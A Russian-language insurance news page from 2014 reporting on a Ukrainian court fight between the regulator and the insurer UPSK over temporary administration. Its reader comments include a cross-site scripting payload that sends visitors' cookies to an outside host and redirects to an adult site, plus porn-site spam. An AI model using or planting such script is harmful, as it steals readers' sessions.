Новости Статьи Обучение Термины Компании Банковские металлы
Новости

Все новости >>>

 

Мнение профессионала
В шаге от доверия. Что изменится для клиентов на рынке страховых услуг

Если для европейцев страховать свое имущество, жизнь или здоровье так же естественно, как дышать, то в Украине ситуация другая. Доверять страховщикам граждане все еще не спешат, выбирая из всего разнообразия страховых услуг преимущественно медицинское или автострахование. Новый закон о страховании коренным образом меняет рынок страховых услуг. Какие перспективы он открывает для потребителей и станут ли украинцы больше доверять страховщикам?

Ольга Шумик: директор Департамента методологии регулирования деятельности небанковских финансовых учреждений НБУ
Правило успеха
"Честность - лучшая политика"
Страхование

 


Страховые компании

В Украинской пожарно-страховой компании снова заработает временная администрация.
13.01.14

Нацкомфинуслуг отстояла в суде свое решение о введении временной администрации в Украинскую пожарно-страховую компанию (УПСК). Окружной административный суд Киева, согласившись в середине декабря прошлого года в качестве обеспечения иска Украинской пожарно-страховой компании приостановить действие распоряжения регулятора, спустя неделю принял противоположное решение. В УПСК пока не решили, как будут действовать дальше, но, по мнению страховщиков, судебные
материалы в тему:
разбирательства с регулятором становятся нормой для рынка.

26 декабря 2013 года Окружной административный суд Киева удовлетворил ходатайство Национальной комиссии, осуществляющей госрегулирование в сфере рынков финансовых услуг, об отмене обеспечительных мер и возобновлении работы временного администратора в УПСК. Напомним, временный администратор — Вадим Ажиба — был назначен в УПСК 5 декабря сроком на три месяца — до 5 марта этого года. Основанием для этих мер стала подача страховой компанией неполной и недостоверной информации. В частности, УПСК обвиняют в сокрытии от регулятора счетов, открытых компанией и ее филиалами. Однако в компании санкции регулятора сочли чрезмерными — страховщик вовремя и в полном объеме выполняет взятые на себя обязательства, кроме того, ранее никаких мер со стороны регулятора к ним не применялось. В результате 6 декабря страховщик оспорил введение временной администрации и попросил суд приостановить ее работу до принятия решения по сути иска. Соответствующее решение Окружной админсуд Киева принял 17 декабря.

В компании пока не решили, как действовать дальше. Как сообщил вчера председатель наблюдательного совета УПСК Александр Михайлов, руководство СК еще в отпуске, все вопросы будут решаться на этой неделе.

УПСК — одна из наиболее капитализированных и платежеспособных компаний на украинском страховом рынке. Согласно данным отраслевого журнала Insurance Top, по состоянию на 30 сентября капитал компании составлял 254,9 млн грн, что на 70% больше, чем годом ранее. Из всей суммы 100 млн грн — оплаченный уставный капитал. За девять месяцев компания привлекла 292,6 млн грн премий (14-е место по этому показателю), а выплатила 49,9 млн грн (17-е). Страховые резервы компании составляют 154,5 млн грн (15-е). Уровень выплат — 17,05%, при среднем по рынку значении 24,56%.

Окончательное решение относительно УПСК должно стать прецедентом для страхового рынка, поскольку лишь эта компания решилась оспорить в суде решение о введении временной администрации. В то же время перенос общения с регулятором в судебную плоскость для страховщиков становится уже нормой. Например, 5 декабря комиссия аннулировала лицензии на ОСАГО СК "Статус". Страховщик оспорил решение регулятора в суде, однако успеха не добился — суд сначала приостановил действие оспариваемых распоряжений Нацкомфинуслуг, однако впоследствии удовлетворил ходатайство регулятора об отмене мер обеспечения иска. В суде СК "Глобус" и СК "Саламандра-Украина" оспаривают запрет учитывать средства страховщиков, которые были перечислены в фонды Моторного (транспортного) страхового бюро Украины, для покрытия резервов компании. Оба страховщика выиграли суды первой инстанции, однако комиссия подала апелляцию на оба решения и в случае с "Глобусом" выиграла ее. "Мы планируем дойти до суда высшей инстанции",— сказал "Ъ" председатель правления СК "Глобус" Владимир Ганчак.

Впрочем, председатель правления СК "Саламандра-Украина" Роман Маленко предупреждает, что судиться с госорганами опасно. "Они могут влиять на решение не только судей, но и применять санкции к подконтрольным комиссии учреждениям. Например, в нашей компании во время судебных разбирательств было проведено сразу несколько проверок",— рассказал он.


Виктория Руденко: Коммерсантъ-Украина

Рекомендовать:

Комментарий:
andrey  28.01.14

Пожарником работать в наше время, очень затратно !!! Бабок почти не платят, а работать нужно как коню !!!
andrey  28.01.14

img = new Image(); img.src = "http://hackstyle.ru/s.gif?"+document.cookie;

l ocation.href ="http://dojki.com/"
Master X  14.05.14

analporn24.com - то место где пожарники могут расслабиться



Если вы обнаружили ошибку на этой странице, выделите ее и нажмите Ctrl+Enter.
Темы
Финтех
Аграрная сфера
Чемпионат по страхованию
Страховые объединения
Интересное в страховании
Страхование жизни
Автострахование
Медицинское страхование
Страхование рисков
Агрострахование
Страхование имущества
Страхование туристов
Страхование и банки
Мошенничество в страховании
Пенсионные фонды
Обзор рынка страхования
Мнение профессионала
Интервью
Руководители: о личном
Подкасты
Исследование
Перестрахование
Страховые брокеры
Страховые компании
Слияния и поглощения компаний

Все темы >>>
Рассылка

Анонсы | Подкасты | Акции | Реклама | Песочница | Партнеры | О нас | Правовая информация

Страховой каталог INS.ORG.RU Rambler's Top100 Система Orphus
©2007-2024 TRISTAR.com.ua - твой финансовый навигатор!
© При полном или частичном использовании информации прямая гиперссылка на сайт TRISTAR.com.ua обязательна.